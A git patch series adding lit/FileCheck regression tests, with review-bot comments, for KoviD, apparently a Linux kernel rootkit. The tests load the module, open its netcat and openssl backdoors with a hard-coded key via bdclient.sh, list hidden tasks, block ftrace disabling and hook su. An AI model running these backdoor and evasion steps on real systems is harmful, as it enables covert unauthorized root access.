From 66cd7caff4b3f8fec84b06b6bd6d85678b4cf7a0 Mon Sep 17 00:00:00 2001
From: djtodoro
Date: Mon, 2 Dec 2024 12:58:31 +0100
Subject: [PATCH 1/7] test: Add native/proc-timeout.test
---
 Makefile | 6 ++++--
 test/native/hide-unhide-module.test | 1 +
 test/native/proc-timeout.test | 15 +++++++++++++++
 3 files changed, 20 insertions(+), 2 deletions(-)
 create mode 100644 test/native/proc-timeout.test
diff --git a/Makefile b/Makefile
index aa480d3..1bfdb45 100644
--- a/Makefile
+++ b/Makefile
@@ -16,15 +16,17 @@ UUIDGEN := $(shell uuidgen)
 ifndef TEST_ENV
 BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
 UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
+PRCTIMEOUT := 1200
 else
 BDKEY=0x7d3b1cb572f16425
 UNHIDEKEY=0x2
+PRCTIMEOUT := 120
 endif
 # PROCNAME, /proc/ interface.
 COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \
- -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \
- -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=1200 \
+ -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK \
+ -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=$(PRCTIMEOUT) \
 -DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\"
 EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}
diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test
index 13ceff5..96db504 100644
--- a/test/native/hide-unhide-module.test
+++ b/test/native/hide-unhide-module.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test
new file mode 100644
index 0000000..7e92de6
--- /dev/null
+++ b/test/native/proc-timeout.test
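Review bot: The rewritten COMPILER_OPTIONS continuation lines still pass `-DCPUHACK` twice, once on each of the two `+` lines, so the duplicate the hunk was already editing survives; dropping it from the second line leaves `-DPROCNAME_MAXLEN=256 -DPRCTIMEOUT=$(PRCTIMEOUT) \`. The new `PRCTIMEOUT := 120` in the `else` branch uses `:=` where the neighbouring TEST_ENV assignments use `=`; either flavour works for a literal, but the branch reads better if it matches. Nothing records why the test build gets a different value, so a comment above the two assignments would help, e.g. `# PRCTIMEOUT: /proc interface timeout in seconds; the TEST_ENV value is what test/native/proc-timeout.test expects ("timeout: 120s")`.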
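Review bot: The added `# REQUIRES: 0` disables the test by naming a feature that is never defined, which only holds as long as no lit config ever registers a feature called `0`, and it leaves no record of why the test is off. The usual lit spelling is `# UNSUPPORTED: true` (or `# XFAIL: *` for a known failure) with a comment giving the reason, e.g. `# UNSUPPORTED: true` followed by `# Disabled: <reason, issue link>`. The same marker is added to each new test later in this series, so the change applies to all of them.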
@@ -0,0 +1,15 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sleep 10
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+sleep 140
+sudo dmesg
+sudo rmmod kovid
+
+# CHECK: /proc/myprocname loaded, timeout: 120s
+# CHECK: /proc/myprocname unloaded.
From da9886a0f8a900afa51725b047e8b801005d8af9 Mon Sep 17 00:00:00 2001
From: djtodoro
Date: Mon, 2 Dec 2024 14:11:48 +0100
Subject: [PATCH 2/7] test: Add native/ftrace-disable-enable.test
---
 test/native/ftrace-disable-enable.test | 58 ++++++++++++++++++++++++++
 test/native/proc-timeout.test | 1 +
 2 files changed, 59 insertions(+)
 create mode 100644 test/native/ftrace-disable-enable.test
diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test
new file mode 100644
index 0000000..e2dfcc2
--- /dev/null
+++ b/test/native/ftrace-disable-enable.test
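Review bot: The script never clears the kernel ring buffer before loading the module, so the final `sudo dmesg` can match `loaded, timeout: 120s` and `unloaded.` left over from an earlier run or from another test in this directory; the other tests in this series open with `sudo dmesg -c`, and this one should too. `kill -CONT 31337` targets a fixed PID with no explanation: if it is a trigger the module intercepts that deserves a comment, and when no such process exists the command only prints to stderr (which `bash %s > %t.log` does not capture) and the script carries on. `sleep 140` and the `timeout: 120s` CHECK both hard-code the TEST_ENV value of PRCTIMEOUT from the Makefile; a comment such as `# PRCTIMEOUT is 120 under TEST_ENV (see Makefile); wait past it so the unload message is logged` keeps the two in step.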
@@ -0,0 +1,58 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+sudo insmod ../../../build/kovid.ko
+
+# Check initial value of ftrace_enabled
+INITIAL_VALUE=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Initial value of ftrace_enabled: $INITIAL_VALUE"
+
+# Attempt to disable ftrace by writing 0 to ftrace_enabled
+echo 0 > /proc/sys/kernel/ftrace_enabled
+READ_VALUE=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing 0: $READ_VALUE"
+
+# Verify kovid functionality using list-hidden-tasks
+sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
+echo list-hidden-tasks > /proc/myprocname
+echo "Kovid functionality with ftrace_enabled=0 is working."
+
+# Attempt another ftrace write with a different value (e.g., 2)
+echo 2 > /proc/sys/kernel/ftrace_enabled
+READ_VALUE2=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing 2: $READ_VALUE2"
+
+
+# Verify kovid functionality again using list-hidden-tasks
+echo list-hidden-tasks > /proc/myprocname
+echo "Kovid functionality with ftrace_enabled=2 is working."
+
+# Test echo with invalid values
+echo -1 > /proc/sys/kernel/ftrace_enabled
+READ_INVALID=$(cat /proc/sys/kernel/ftrace_enabled)
+echo "Value of ftrace_enabled after writing -1: $READ_INVALID"
+
+# Cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Initial value of ftrace_enabled: 1
+# CHECK: Value of ftrace_enabled after writing 0: 1
+# CHECK: Kovid functionality with ftrace_enabled=0 is working.
+# CHECK: Value of ftrace_enabled after writing 2: 1
+# CHECK: Kovid functionality with ftrace_enabled=2 is working.
+# CHECK: Value of ftrace_enabled after writing -1: 1
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: hide: {{.*}}
+# CHECK: hide: {{.*}}
+# CHECK: Got event
+# CHECK: unloaded
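Review bot: None of the writes to `/proc/sys/kernel/ftrace_enabled` run as root: `echo 0 > /proc/sys/kernel/ftrace_enabled` is a redirection performed by the unprivileged `bash %s` process that lit starts, and `sudo` appears only on the insmod/rmmod/bdclient lines, so each write fails with a permission error on stderr (not captured by `> %t.log`) and the file keeps reporting 1 whatever the module does. Route every write through a privileged process, e.g. `echo 0 | sudo tee /proc/sys/kernel/ftrace_enabled >/dev/null`; the `echo list-hidden-tasks > /proc/myprocname` lines have the same problem unless that file's mode allows the test user to write it. The two `Kovid functionality ... is working.` messages are echoed unconditionally, so their CHECK lines can never fail; gate them on the command, `if echo list-hidden-tasks | sudo tee /proc/myprocname >/dev/null; then echo "Kovid functionality with ftrace_enabled=0 is working."; fi`. Writing 2 or -1 may also be rejected by the kernel's own range check on that sysctl independently of the module, so those expectations need re-checking once the writes actually reach the kernel.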
diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test
index 7e92de6..a1f80fc 100644
--- a/test/native/proc-timeout.test
+++ b/test/native/proc-timeout.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
From 48aa238484fa943e534040b210755cd3e4d15b95 Mon Sep 17 00:00:00 2001
From: djtodoro
Date: Mon, 2 Dec 2024 14:45:19 +0100
Subject: [PATCH 3/7] test: Add native/nc-backdoor-remove-and-install-nc-tool.test
---
 docs/TestFeatures.md | 33 +++++++------
 test/native/ftrace-disable-enable.test | 1 +
 ...c-backdoor-remove-and-install-nc-tool.test | 49 +++++++++++++++++++
 3 files changed, 68 insertions(+), 15 deletions(-)
 create mode 100644 test/native/nc-backdoor-remove-and-install-nc-tool.test
diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
index 7aa48b8..8d78034 100644
--- a/docs/TestFeatures.md
+++ b/docs/TestFeatures.md
@@ -296,18 +296,21 @@ Here are information about testing of the features available. NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should contain `# REQUIRES: DEPLOY_ONLY` marker.
-| Feature | Tested | Regression Test |
-| :--------------------------------------------------| :------------------------------| :------------------------------------ |
-| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test |
-| kovid (DEPLOY) doesn't appear in /var /sys etc. | Yes | cross/no-kovid-found.test |
-| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test |
-| Hide nc process | Yes | complex/nc-hide-pid{_host}.test |
-| nc backdoor | Yes | native/nc-backdoor.test |
-| openssl backdoor | Yes | native/openssl-backdoor.test |
-| tty backdoor | Yes | native/tty-backdoor.test |
-| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test |
-| Hide/Unhide Module | Yes | native/hide-unhide-module.test |
-| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test |
-| hide file | Yes | native/hiden-file.test |
-| hide file (2) | Yes | native/hiden-file-in-all-dirs.test |
-| unhide module | Yes | native/hide-unhide-module.test |
+| Feature | Tested | Regression Test |
+| :--------------------------------------------------| :------------------------------| :------------------------------------------------------|
+| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test |
+| kovid (DEPLOY) doesn't appear in /var /sys etc. 
| Yes | cross/no-kovid-found.test |
+| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test |
+| Hide nc process | Yes | complex/nc-hide-pid{_host}.test |
+| nc backdoor | Yes | native/nc-backdoor.test |
+| openssl backdoor | Yes | native/openssl-backdoor.test |
+| tty backdoor | Yes | native/tty-backdoor.test |
+| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test |
+| Hide/Unhide Module | Yes | native/hide-unhide-module.test |
+| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test |
+| hide file | Yes | native/hiden-file.test |
+| hide file (2) | Yes | native/hiden-file-in-all-dirs.test |
+| unhide module | Yes | native/hide-unhide-module.test |
+| procfile timeout | Yes | native/proc-timeout.test |
+| Ftrace | Yes | native/ftrace-disable-enable.test |
+| Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test |
diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test
index e2dfcc2..8a1903f 100644
--- a/test/native/ftrace-disable-enable.test
+++ b/test/native/ftrace-disable-enable.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test
new file mode 100644
index 0000000..d0b3a42
--- /dev/null
+++ b/test/native/nc-backdoor-remove-and-install-nc-tool.test
@@ -0,0 +1,49 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Prepare system by removing netcat (simulating backdoor tool removal)
+echo "Removing netcat..."
+sudo mv /usr/bin/nc /usr/bin/nc2 || echo "Netcat already removed."
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Attempt to establish a connection without netcat
+echo "Testing connection without netcat..."
+if ! sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+ echo "Connection failed as expected without netcat."
+else
+ echo "ERROR: Connection unexpectedly succeeded without netcat."
+fi
+
+# Restore netcat (simulating backdoor tool installation)
+echo "Restoring netcat..."
+sudo mv /usr/bin/nc2 /usr/bin/nc || echo "Netcat already restored."
+
+# Attempt to establish a connection with netcat restored
+echo "Testing connection with netcat restored..."
+if sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+ echo "Connection succeeded as expected with netcat restored."
+else
+ echo "ERROR: Connection unexpectedly failed with netcat restored."
+fi
+
+# Remove the kernel module and cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection failed as expected without netcat.
+# CHECK: /bin/sh: 0: can't access tty; job control turned off
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: Got event
+# CHECK: unloaded
From cca7d7b879e0599ebdffa55f577e28b3520988f3 Mon Sep 17 00:00:00 2001
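Review bot: The test renames `/usr/bin/nc` on the host and only restores it on the normal path, so an aborted run (lit timeout, a hung `bdclient.sh`, an interrupt) leaves the machine without netcat; add `trap 'sudo mv -n /usr/bin/nc2 /usr/bin/nc 2>/dev/null' EXIT` right after the first `mv` so the restore is unconditional. The `ERROR:` branches are echoed but never checked, and the success message with netcat restored has no CHECK either, so the second half of the test cannot fail; add `# CHECK: Connection succeeded as expected with netcat restored.` and a `# CHECK-NOT: ERROR:` between the two connection CHECKs. Note also that `bdclient.sh nc ...` presumably runs netcat on the client side, so what the first half exercises is the client failing to start rather than anything in the module; a comment saying which side is under test would avoid that confusion.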
From: djtodoro
Date: Mon, 2 Dec 2024 15:17:16 +0100
Subject: [PATCH 4/7] test: Add test/native/nc-backdoor-bdclient.test
---
 docs/TestFeatures.md | 1 +
 test/native/nc-backdoor-bdclient.test | 47 +++++++++++++++++++
 ...c-backdoor-remove-and-install-nc-tool.test | 1 +
 3 files changed, 49 insertions(+)
 create mode 100644 test/native/nc-backdoor-bdclient.test
diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
index 8d78034..041ccb7 100644
--- a/docs/TestFeatures.md
+++ b/docs/TestFeatures.md
@@ -314,3 +314,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
 | procfile timeout | Yes | native/proc-timeout.test |
 | Ftrace | Yes | native/ftrace-disable-enable.test |
 | Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test |
+| bdclient.sh test | Yes | native/nc-backdoor-bdclient.test |
diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test
new file mode 100644
index 0000000..646796b
--- /dev/null
+++ b/test/native/nc-backdoor-bdclient.test
@@ -0,0 +1,47 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s &> %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Define the number of connection attempts
+NUM_ATTEMPTS=5
+SUCCESS_COUNT=0
+FAIL_COUNT=0
+
+# Automate bdclient.sh for repeated connection and disconnection
+for i in $(seq 1 $NUM_ATTEMPTS); do
+ echo "Attempt $i: Establishing connection..."
+ if sudo timeout 5 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then
+ echo "Connection attempt $i succeeded."
+ SUCCESS_COUNT=$((SUCCESS_COUNT + 1))
+ else
+ echo "Connection attempt $i failed."
+ FAIL_COUNT=$((FAIL_COUNT + 1))
+ fi
+ # Wait briefly between attempts
+ sleep 1
+done
+
+# Remove the kernel module and cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+# CHECK: Connection received on
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: Got event
+# CHECK: unloaded
diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test
index d0b3a42..4c02b80 100644
--- a/test/native/nc-backdoor-remove-and-install-nc-tool.test
+++ b/test/native/nc-backdoor-remove-and-install-nc-tool.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
From 3d2b4568928000460511d3798523cfc21e82056e Mon Sep 17 00:00:00 2001
From: djtodoro
Date: Mon, 2 Dec 2024 15:30:10 +0100
Subject: [PATCH 5/7] test: Add test/native/gift-bdclient.test
---
 docs/TestFeatures.md | 1 +
 test/native/gift-bdclient.test | 46 +++++++++++++++++++++++++++
 test/native/nc-backdoor-bdclient.test | 1 +
 3 files changed, 48 insertions(+)
 create mode 100644 test/native/gift-bdclient.test
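Review bot: SUCCESS_COUNT and FAIL_COUNT are maintained inside the loop but never printed or checked, so the exit status of `bdclient.sh` has no bearing on the verdict; the five `Connection received on` CHECKs only show that something accepted five connections. Print the totals after the loop, `echo "Attempts: ok=$SUCCESS_COUNT failed=$FAIL_COUNT"`, and pin them with `# CHECK: Attempts: ok=5 failed=0`, or whatever split is actually expected, since `timeout 5` exits 124 when it has to kill a session that stays open and that would count as a failure here. If the counters are not meant to be asserted they should be removed rather than left as dead bookkeeping.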
diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
index 041ccb7..cfbdcbf 100644
--- a/docs/TestFeatures.md
+++ b/docs/TestFeatures.md
@@ -315,3 +315,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
 | Ftrace | Yes | native/ftrace-disable-enable.test |
 | Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test |
 | bdclient.sh test | Yes | native/nc-backdoor-bdclient.test |
+| bdclient.sh GIFT | Yes | test/native/gift-bdclient.test |
diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test
new file mode 100644
index 0000000..e56247a
--- /dev/null
+++ b/test/native/gift-bdclient.test
@@ -0,0 +1,46 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+# Insert the kovid kernel module
+sudo insmod ../../../build/kovid.ko
+
+# Test parameters
+REMOTE_IP="127.0.0.1" # Use localhost for the remote IP
+REMOTE_PORT="9999"
+BACKDOOR_KEY="0x7d3b1cb572f16425"
+GIFT_IP="127.0.0.1" # Use localhost for GIFT
+
+# Test connection without GIFT
+echo "Testing connection without GIFT..."
+if GIFT="" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then
+ echo "Connection without GIFT succeeded."
+else
+ echo "ERROR: Connection without GIFT failed."
+fi
+
+# Test connection with GIFT
+echo "Testing connection with GIFT..."
+if GIFT="$GIFT_IP" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then
+ echo "Connection with GIFT succeeded."
+else
+ echo "ERROR: Connection with GIFT failed."
+fi
+
+# Cleanup
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: Connection without GIFT succeeded.
+# CHECK: Connection with GIFT succeeded.
+
+# CHECK: kv: using kprobe for kallsyms_lookup_name
+# CHECK: Waiting for event
+# CHECK: loaded
+# CHECK: Got event
+# CHECK: unloaded
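Review bot: `GIFT="" sudo ...` and `GIFT="$GIFT_IP" sudo ...` place the variable in the environment of `sudo` itself, and sudo's default `env_reset` policy strips it before bdclient.sh starts, so both invocations most likely run with GIFT unset and the two halves of the test exercise the same path. Pass it through sudo instead, `sudo GIFT="$GIFT_IP" ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"` (sudo accepts `VAR=value` arguments subject to policy) or `sudo env GIFT="$GIFT_IP" ...`. Unlike the other tests in this series these two calls have no `timeout`, so a session that stays open hangs the whole run; wrap them as `sudo timeout 10 ...` as the nc-based tests do. A short comment on what GIFT changes in bdclient.sh would also make the expected difference between the two runs checkable instead of both simply printing "succeeded".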
diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test
index 646796b..f6ce207 100644
--- a/test/native/nc-backdoor-bdclient.test
+++ b/test/native/nc-backdoor-bdclient.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
From 48dfb6def6f0d595c34ee06662c0064254281ded Mon Sep 17 00:00:00 2001
From: djtodoro
Date: Mon, 2 Dec 2024 18:37:33 +0100
Subject: [PATCH 6/7] test: Add test/native/kaudit.test
---
 docs/TestFeatures.md | 1 +
 test/native/gift-bdclient.test | 1 +
 test/native/kaudit.test | 19 +++++++++++++++++++
 3 files changed, 21 insertions(+)
 create mode 100644 test/native/kaudit.test
diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md
index cfbdcbf..2cbada8 100644
--- a/docs/TestFeatures.md
+++ b/docs/TestFeatures.md
@@ -316,3 +316,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
 | Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test |
 | bdclient.sh test | Yes | native/nc-backdoor-bdclient.test |
 | bdclient.sh GIFT | Yes | test/native/gift-bdclient.test |
+| Kaudit | Yes | test/native/kaudit.test |
diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test
index e56247a..e9bbb0a 100644
--- a/test/native/gift-bdclient.test
+++ b/test/native/gift-bdclient.test
@@ -1,3 +1,4 @@
+# REQUIRES: 0
 # REQUIRES: DEBUG_ONLY
 # REQUIRES: NATIVE_TESTS
diff --git a/test/native/kaudit.test b/test/native/kaudit.test
new file mode 100644
index 0000000..9e2e37d
--- /dev/null
+++ b/test/native/kaudit.test
@@ -0,0 +1,19 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+sudo insmod ../../../build/kovid.ko
+kill -CONT 999
+su
+exit
+sudo rmmod kovid
+sudo dmesg
+
+# CHECK: loaded.
+# CHECK: Cool! Now try 'su'
+# CHECK: Uninstalling: 'sys_exit_group' syscall=1
+# CHECK: unloaded.
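Review bot: `su` followed by `exit` on separate lines does not run `exit` inside the root shell: `su` reads from whatever stdin lit hands the script (not from the script file), and once it returns the bash builtin `exit` terminates the test script itself, so `sudo rmmod kovid` and `sudo dmesg` never run, the module stays loaded and the log has nothing for the CHECK lines to match. Replace the two lines with a non-interactive form that returns to the script, e.g. `su -c 'id -u' root </dev/null || echo "su failed"`, and consider a `# CHECK:` on its output so a password prompt or failure is visible. `kill -CONT 999` is a hard-coded PID with no comment; if it is the trigger the module expects (the `Cool! Now try 'su'` CHECK suggests so) say it, e.g. `# NOTE: PID 999 is presumably the trigger that arms the su hook -- confirm against the module source`.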
From f2aa193fdb7d03ed6a0827353bbbd911c6408b8f Mon Sep 17 00:00:00 2001
From: djtodoro
Date: Mon, 2 Dec 2024 20:19:07 +0100
Subject: [PATCH 7/7] Add todo for native/ftrace-disable-enable.test
---
 test/native/ftrace-disable-enable.test | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test
index 8a1903f..dd4d9bf 100644
--- a/test/native/ftrace-disable-enable.test
+++ b/test/native/ftrace-disable-enable.test
@@ -57,3 +57,10 @@ sudo dmesg
 # CHECK: hide: {{.*}}
 # CHECK: Got event
 # CHECK: unloaded
+
+# FIXME: It should print
+# Value of ftrace_enabled after writing 2: 1
+# Value of ftrace_enabled after writing 0: 0
+# etc.
+# I have tried manually, as root, and it works.
+# I am not sure why `sudo su` did not make difference here.
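Review bot: The FIXME asks why `sudo su` made no difference; the visible cause is that the test's writes (`echo 0 > /proc/sys/kernel/ftrace_enabled` and the others earlier in this file) are plain redirections performed by the unprivileged `bash %s` process lit starts, which a `sudo su` done in another shell cannot affect, so the writes fail with a permission error and the file keeps reporting 1. Rather than leaving an open question, the comment should record the diagnosis and the fix, e.g. `# FIXME: the ftrace_enabled writes are unprivileged (plain '>' redirection runs as the test user); route them through 'sudo tee' and re-check the expected values`. The expected values listed here (`after writing 2: 1`, `after writing 0: 0`) also contradict the CHECK lines just above, which expect 1 in every case; one of the two needs to change once the writes actually reach the kernel.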